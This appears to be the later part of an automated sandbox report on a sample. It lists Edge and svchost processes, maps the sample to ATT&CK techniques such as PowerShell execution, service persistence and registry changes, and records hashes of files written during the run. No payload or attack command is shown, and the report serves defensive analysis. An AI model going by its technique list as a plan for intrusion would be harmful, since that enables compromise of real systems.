                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
                                                                                                                                              3⤵
                                                                                                                                                PID:5976
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
                                                                                                                                                3⤵
                                                                                                                                                  PID:5984
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3096
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5040
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5452
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5324
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6084
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 /prefetch:8
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3320
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5904
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3352
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3536
                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4852
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  PID:4964
                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1176
                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2576
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      PID:1456
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4384
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4904

                                                                                                                                                                        Network

                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                        Initial Access

                                                                                                                                                                        Execution

                                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                                        1
                                                                                                                                                                        T1059

                                                                                                                                                                        PowerShell

                                                                                                                                                                        1
                                                                                                                                                                        T1059.001

                                                                                                                                                                        Persistence

                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                        2
                                                                                                                                                                        T1543

                                                                                                                                                                        Windows Service

                                                                                                                                                                        2
                                                                                                                                                                        T1543.003

                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                        2
                                                                                                                                                                        T1543

                                                                                                                                                                        Windows Service

                                                                                                                                                                        2
                                                                                                                                                                        T1543.003

                                                                                                                                                                        Defense Evasion

                                                                                                                                                                        Modify Registry

                                                                                                                                                                        3
                                                                                                                                                                        T1112

                                                                                                                                                                        Credential Access

                                                                                                                                                                        Discovery

                                                                                                                                                                        Query Registry

                                                                                                                                                                        2
                                                                                                                                                                        T1012

                                                                                                                                                                        System Information Discovery

                                                                                                                                                                        3
                                                                                                                                                                        T1082

                                                                                                                                                                        Lateral Movement

                                                                                                                                                                        Collection

                                                                                                                                                                        Exfiltration

                                                                                                                                                                        Command and Control

                                                                                                                                                                        Impact

                                                                                                                                                                        Resource Development

                                                                                                                                                                        Reconnaissance

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                          Filesize

                                                                                                                                                                          3KB

                                                                                                                                                                          MD5

                                                                                                                                                                          661739d384d9dfd807a089721202900b

                                                                                                                                                                          SHA1

                                                                                                                                                                          5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                                                                                          SHA256

                                                                                                                                                                          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                                                                                          SHA512

                                                                                                                                                                          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                          Filesize

                                                                                                                                                                          152B

                                                                                                                                                                          MD5

                                                                                                                                                                          eaa3db555ab5bc0cb364826204aad3f0

                                                                                                                                                                          SHA1

                                                                                                                                                                          a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca

                                                                                                                                                                          SHA256

                                                                                                                                                                          ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b

                                                                                                                                                                          SHA512

                                                                                                                                                                          e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                          Filesize

                                                                                                                                                                          152B

                                                                                                                                                                          MD5

                                                                                                                                                                          4b4f91fa1b362ba5341ecb2836438dea

                                                                                                                                                                          SHA1

                                                                                                                                                                          9561f5aabed742404d455da735259a2c6781fa07

                                                                                                                                                                          SHA256

                                                                                                                                                                          d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c

                                                                                                                                                                          SHA512

                                                                                                                                                                          fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          401a941f5c8ad601a766f9fa09f48984

                                                                                                                                                                          SHA1

                                                                                                                                                                          d182ff90b5611636a6f77e36c4930d71faca5c4a

                                                                                                                                                                          SHA256

                                                                                                                                                                          2fab748b531985eb292f0a58b5cc8001024454c477da17324c666f9d4e32f597

                                                                                                                                                                          SHA512

                                                                                                                                                                          addbd2dc510295efe788d85110c58b7c5ede37236c5950bbe96503700149bb26f713001c4f648ba79f28999ad27b1b8f29906387fe254d008db092a902c7d97d

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          ed299f112bf8603c58461d0eef2676d8

                                                                                                                                                                          SHA1

                                                                                                                                                                          89fcff3d87a0688a1d9825b41575524eaa4a8027

                                                                                                                                                                          SHA256

                                                                                                                                                                          aa53cafabd252f810d56676d8ae24eefb2a5948a974f8904852f90921be23f6c

                                                                                                                                                                          SHA512

                                                                                                                                                                          35bdd165023cd3f4d9b5159841b1a885979c066f825841eedf8c1177e61fc3fbf273288d82d98a75789670cd2edc140f33175a1e944d266aa42213e28682d9da

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                                                                          Filesize

                                                                                                                                                                          4KB

                                                                                                                                                                          MD5

                                                                                                                                                                          25d9d1b73886cde8ee3236e151d27111

                                                                                                                                                                          SHA1

                                                                                                                                                                          13df9514ce0bf415735a085fd8f8d603d984d208

                                                                                                                                                                          SHA256

                                                                                                                                                                          1c28605176c99ecf27253e248ad60e8cd8e347489ef75007c86ac7fad82c4594

                                                                                                                                                                          SHA512

                                                                                                                                                                          6e3b8d75af8b67a487f320928a4afda18eebc4ca68e3c680ac6089f8a80f028ad24b4a68b2ca5370560cf2e1306abd92044de6fd9b3ba0f153762749339fb22d

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                          Filesize

                                                                                                                                                                          5KB

                                                                                                                                                                          MD5

                                                                                                                                                                          4b72ac302ff032e89b6ee009d7e373a6

                                                                                                                                                                          SHA1

                                                                                                                                                                          1b49dd09fb477cce86a5b2da5194d1c2cd38325a

                                                                                                                                                                          SHA256

                                                                                                                                                                          0e2fde48b405814878b72ed048363382a181abc8275fb60e79c4c803dce3ab84

                                                                                                                                                                          SHA512

                                                                                                                                                                          80584f3e69a57cb93f6e6ff88a85978856eba66ab837c31bbce50d10e041a06091b6b62acc9abafe080fd68a3bce5edbab75d449fdb5c583af27599a616b2a52

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                          Filesize

                                                                                                                                                                          6KB

                                                                                                                                                                          MD5

                                                                                                                                                                          f47cc916fb15b0004f68f1df10a9d12a

                                                                                                                                                                          SHA1

                                                                                                                                                                          f68ea5dd16f796b7c73a34d7162e54d0d4d0e779

                                                                                                                                                                          SHA256

                                                                                                                                                                          4f422ce0e92839cb69d05d3ca6137b1cd1cef012391a4d7c116bce54e4462c31

                                                                                                                                                                          SHA512

                                                                                                                                                                          b92ce2eaa181bf2b25a89fe9c06d41f363a508686945f40c49a4724bdd75cf1208f3ad67fa6e29ac4e353daba91cc8ec225756fc873d6821ad16531e6ec616bf

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                          Filesize

                                                                                                                                                                          7KB

                                                                                                                                                                          MD5

                                                                                                                                                                          ae68f3a228f589a7c5ebae9eb9571072

                                                                                                                                                                          SHA1

                                                                                                                                                                          93d37a36c1040c4454bbab51aaffb6d6015df872

                                                                                                                                                                          SHA256

                                                                                                                                                                          b2a648174165bbc4ea40359352c2233a2d581f731e340cf63d9a941423b6164c

                                                                                                                                                                          SHA512

                                                                                                                                                                          9d207a042f7b01626ae0d37ef9324021651a7826d64a03ea263195deb83b6f2a17383dfceaf6614581bfd4d199a96d8cbe956e2145b36b81a8df795e831b3d75

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                          Filesize

                                                                                                                                                                          7KB

                                                                                                                                                                          MD5

                                                                                                                                                                          d09ad25edcc659ccdf4831d12c70a922

                                                                                                                                                                          SHA1

                                                                                                                                                                          75b0716554c7d1143cfe3c27cf69b328eefd17ce

                                                                                                                                                                          SHA256

                                                                                                                                                                          3000017a6455675659f838a7c7ac8d118b4ca4cb091dc205391a7b7f3cd26ce5

                                                                                                                                                                          SHA512

                                                                                                                                                                          116389658fbd76cdfe5693ef6ed1d0884271b51b4db0c3eba1fe6fd2e4798671a7d415cc44706bf58c64ec73852140592b5cf7175ae9327e2c83508452cb6554

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                          Filesize

                                                                                                                                                                          8KB

                                                                                                                                                                          MD5

                                                                                                                                                                          90494bb46e17b5be243f4fb7260774a9

                                                                                                                                                                          SHA1

                                                                                                                                                                          8f032171f98c52cf8592b6a5889191a18c852c44

                                                                                                                                                                          SHA256

                                                                                                                                                                          df48d6e5c46c0865c520e836258c664f9adecd60e926fc56ac8cc3545bade14d

                                                                                                                                                                          SHA512

                                                                                                                                                                          e895c7500823909673452877634615a11b0d9f88ddf1667105b182068ae51a29a7ef089c9af578ce98e423ad0d932fc57b937582d6e97820e89ad0568e9d1301

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\3ab7365e-9c41-47d2-a44d-4b56a4c4f7b9\index-dir\the-real-index
                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          2207cdf90a08372e951861b972841448

                                                                                                                                                                          SHA1

                                                                                                                                                                          7ff9d234c401bcf375555595c3dd22b441d30c07

                                                                                                                                                                          SHA256

                                                                                                                                                                          be00f64ab4e66c827b49e6a7034962b956d1b9134eba147bfa60cedae106fa25

                                                                                                                                                                          SHA512

                                                                                                                                                                          0e2974562720d2a891fe4207ff10bf9b7d48e77d15017db24b981ec2897cd39921e2f4b68e1e724d449a24167f81269ee0fcc298da2a8e07d8ab14e9e273adcd

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\3ab7365e-9c41-47d2-a44d-4b56a4c4f7b9\index-dir\the-real-index~RFe58fe02.TMP
                                                                                                                                                                          Filesize

                                                                                                                                                                          48B

                                                                                                                                                                          MD5

                                                                                                                                                                          ef67eea1b0fd20c14e6c535e63e94551

                                                                                                                                                                          SHA1

                                                                                                                                                                          0b818fd43b21a4e5328606feb3b868887ec8dd7f

                                                                                                                                                                          SHA256

                                                                                                                                                                          aeb50985209baa4618f9f163383d2a179d8e3f5883c079ee4807065990a68794

                                                                                                                                                                          SHA512

                                                                                                                                                                          7a897a81a24b03ee3edc23b5e38b58487b593c58b6972cc6b5f0cbe25a389af3ad3e106c5e52720397b0815278fc19a4604af9d36c4313c5e67135ff9e222b95

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\62b9d0c4-dc3f-4c95-8423-302133f066f9\index-dir\the-real-index
                                                                                                                                                                          Filesize

                                                                                                                                                                          624B

                                                                                                                                                                          MD5

                                                                                                                                                                          1625ce158060ca9d24f745cde4c1e061

                                                                                                                                                                          SHA1

                                                                                                                                                                          337427b83c6970f193a6ff23f39f265b1fb9b4cf

                                                                                                                                                                          SHA256

                                                                                                                                                                          8459fc70d4c6dbde2bd22d226762e14f0c715c26774d5c4b80dcd2b9553d6cbf

                                                                                                                                                                          SHA512

                                                                                                                                                                          e124dbd8f1764281ce3ffab2aae14fa81f278551b9c6fb7c9b607f90c80e25b48300673ab33cee0f1433874055ff69b1dfdfe518a8618e2357ec6b3ea997c534

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\62b9d0c4-dc3f-4c95-8423-302133f066f9\index-dir\the-real-index~RFe58ae8b.TMP
                                                                                                                                                                          Filesize

                                                                                                                                                                          48B

                                                                                                                                                                          MD5

                                                                                                                                                                          beedcd45121f4da2d92e2fd5b6cefe9f

                                                                                                                                                                          SHA1

                                                                                                                                                                          4315c941150aa9bd2f64d91314b201e1bc05479c

                                                                                                                                                                          SHA256

                                                                                                                                                                          99f70f5aad24e91fb5b7c6a3f806a0d11a057dbb9b99ec745f121fb74fb1562e

                                                                                                                                                                          SHA512

                                                                                                                                                                          a73defd399e1574b3478d5cf7f3300873522527dde79a30852b1292185a0f824986e5dceda3680e581e2a5bd0d9cb0d96ce9095ce8014ff53d4d15ddc86e70ad

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
                                                                                                                                                                          Filesize

                                                                                                                                                                          89B

                                                                                                                                                                          MD5

                                                                                                                                                                          de02ab6cd27858acdba1282f475bdfa9

                                                                                                                                                                          SHA1

                                                                                                                                                                          61c5082b3a853e6926dd112a019379d10438db6b

                                                                                                                                                                          SHA256

                                                                                                                                                                          a6e4ffc5add3cba85ed35235dd422b1cf2c2b249929acfc07a89ba4ca56d0af8

                                                                                                                                                                          SHA512

                                                                                                                                                                          4f1c8e1c5686422cae5b386c180db37c041bad9728f4f1f9b469de083873dc0567a383f13d8fdf11e9f8b9d5b5b8a0029d35d9b5e9375eade0b20b15be633624

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
                                                                                                                                                                          Filesize

                                                                                                                                                                          146B

                                                                                                                                                                          MD5

                                                                                                                                                                          66f98d558c85c4813733291351cb613a

                                                                                                                                                                          SHA1

                                                                                                                                                                          c47415ad226c4ed86b31fe3300756dbeddf4a228

                                                                                                                                                                          SHA256

                                                                                                                                                                          319824e87b70ed03694fe38d00bf70bc342366bf2276729880e06b68bec43906

                                                                                                                                                                          SHA512

                                                                                                                                                                          cf32848a1e460b04093d7217f063a28d3bf8b13589a9544870c09c99034747c374e896f0d547401538cd5712f67d289f0be7c0286d93ff4083d2b05ab8d8e252

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
                                                                                                                                                                          Filesize

                                                                                                                                                                          155B

                                                                                                                                                                          MD5

                                                                                                                                                                          f6086adbd25279c7971c0a63ee981a8a

                                                                                                                                                                          SHA1

                                                                                                                                                                          44f29837fa2965992373eef33c90c5a41ba4ffd4

                                                                                                                                                                          SHA256

                                                                                                                                                                          057b3ebb2ef93356fe9b22694b4129c5d1dad18c3970106de82ea7d2ae23c076

                                                                                                                                                                          SHA512

                                                                                                                                                                          34435f52dfb7f866ce1b121cba797b0ef6498fa4683da5b11c7503bb93c30da58a92e7ce2df398a0b54c81f7e75c4fafd0d7f65136004a0797c04e0f6bb2191a

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
                                                                                                                                                                          Filesize

                                                                                                                                                                          82B

                                                                                                                                                                          MD5

                                                                                                                                                                          63612c1c991531a968cc8a5dbc585e7d

                                                                                                                                                                          SHA1

                                                                                                                                                                          7b7023aeaf936f83b14b3e28d6d4e1d61aec3d5c

                                                                                                                                                                          SHA256

                                                                                                                                                                          574ad157f47dee241ff151d1c739981517185f6d4302e993652b442b2ab2c4d9

                                                                                                                                                                          SHA512

                                                                                                                                                                          2c32fc42df20e827049a14175a7c11511a93999815205cf709b37b300a6e4425f6813560fad78b62da91d625da31478696b86d6e774c36d61645b63b2848fdc8

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
                                                                                                                                                                          Filesize

                                                                                                                                                                          153B

                                                                                                                                                                          MD5

                                                                                                                                                                          4b1fbc97bfdfd78125c2a2942d015cbf

                                                                                                                                                                          SHA1

                                                                                                                                                                          217964a4299155e9190b421f3feb36e983bfc4b2

                                                                                                                                                                          SHA256

                                                                                                                                                                          ae463e22226bd4325b1ba7ada1d5c232fab7f6dc686031897ea3cbc98d38eab0

                                                                                                                                                                          SHA512

                                                                                                                                                                          7afe3147f050018c454b54e835a98bc7b4fee1a377dc76d0a286ed11bf9339c2ef76155848a632351e4c2cb6c3f4c21639d1c2851e8714e0ba59dc83dcbcf1bd

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT
                                                                                                                                                                          Filesize

                                                                                                                                                                          16B

                                                                                                                                                                          MD5

                                                                                                                                                                          46295cac801e5d4857d09837238a6394

                                                                                                                                                                          SHA1

                                                                                                                                                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                          SHA256

                                                                                                                                                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                          SHA512

                                                                                                                                                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
                                                                                                                                                                          Filesize

                                                                                                                                                                          96B

                                                                                                                                                                          MD5

                                                                                                                                                                          a83e08522adf1ab4fd32345ec5b3e833

                                                                                                                                                                          SHA1

                                                                                                                                                                          2642274f2d67c27cd266dc98366894d545552e39

                                                                                                                                                                          SHA256

                                                                                                                                                                          3ee6cd24f1cdbc70b9c84649c36d5c2fbfcfdaee566d3693787409fb820f0545

                                                                                                                                                                          SHA512

                                                                                                                                                                          8882d431b17d6b3cde3553a8d2b16f336953a2c8ad58f3d6901c02f8d84c9e39467a1820eaa12e091c9e44ee11bed2837b995aca2b7c20ffb0b20124d04d9afd

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58a43a.TMP
                                                                                                                                                                          Filesize

                                                                                                                                                                          48B

                                                                                                                                                                          MD5

                                                                                                                                                                          750b6d0397ba939d6e7f148ccd13c12e

                                                                                                                                                                          SHA1

                                                                                                                                                                          1f57d266961f4e937b4e075da9419f478ebb5d94

                                                                                                                                                                          SHA256

                                                                                                                                                                          d6505d30050051ec654351f3a7e28d2a8418a9e00280c7ac9b896d591e8c1ac1

                                                                                                                                                                          SHA512

                                                                                                                                                                          76849f2ebb2d8468f51d5472788c816a6f86bb7c3b15916f0c2f6064dcedd2ff58e2f97977cbcc466ade4770fa6a022a824cfa235062b93efa23b211c6f69d7d

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                                                                                                                                                          Filesize

                                                                                                                                                                          1KB

                                                                                                                                                                          MD5

                                                                                                                                                                          71a1274c43cf2ce8f48c3f579a2d493c

                                                                                                                                                                          SHA1

                                                                                                                                                                          a695fee9397586c1b57701d805d6ed09cff0a893

                                                                                                                                                                          SHA256

                                                                                                                                                                          17be05d62b237cfdc8bccc6b6b7d600e0fd30818b93bd4c009d169740b77b232

                                                                                                                                                                          SHA512

                                                                                                                                                                          9ab5db5737a4a1839f011e1d17704c0a29b112df11f4334de7d23a5c07e49b556bef20eb9d7727369f01adfc758e203baf7ae30c05d6067916f09a64ce55afdc

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5875f6.TMP
                                                                                                                                                                          Filesize

                                                                                                                                                                          538B

                                                                                                                                                                          MD5

                                                                                                                                                                          fc306872e9c2c56ecb9583030b3ffbfa

                                                                                                                                                                          SHA1

                                                                                                                                                                          f7e87901295d17a0c10ee6798e11200558f0d897

                                                                                                                                                                          SHA256

                                                                                                                                                                          363b543ef18be9ea4ecdd1bebabf9a39cbcc1e423ae030a84a091567c42d63e6

                                                                                                                                                                          SHA512

                                                                                                                                                                          2e10303e7707dcd994982c71c6b05d354e502c378276692840e717352a958b80b26f0ac589d8582b1889aeae88b9e2b0a19137992ff8170e712b3c91e5501341

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                                                                                                                          Filesize

                                                                                                                                                                          16B

                                                                                                                                                                          MD5

                                                                                                                                                                          6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                          SHA1

                                                                                                                                                                          58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                          SHA256

                                                                                                                                                                          0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                          SHA512

                                                                                                                                                                          9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                          Download Submit
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                          Filesize

                                                                                                                                                                          11KB

                                                                                                                                                                          MD5

                                                                                                                                                                          d58c73b5a822e935702952e2de917727

                                                                                                                                                                          SHA1

                                                                                                                                                                          5718d694ac9351de028d132aebbd677889817a3f

                                                                                                                                                                          SHA256

                                                                                                                                                                          96f4e60e7853c2121810eb275a4f283a4897c997095a4989a8e825fcec5f624f

                                                                                                                                                                          SHA512

                                                                                                                                                                          76aca8548196f9083d6a0babb1770a52457397202907f24d8bb6c309daa14494963d9e3a90080cbfb44c5a91ae3eb81aeb870514bd762ffd5ee228a6fc1ac2a3

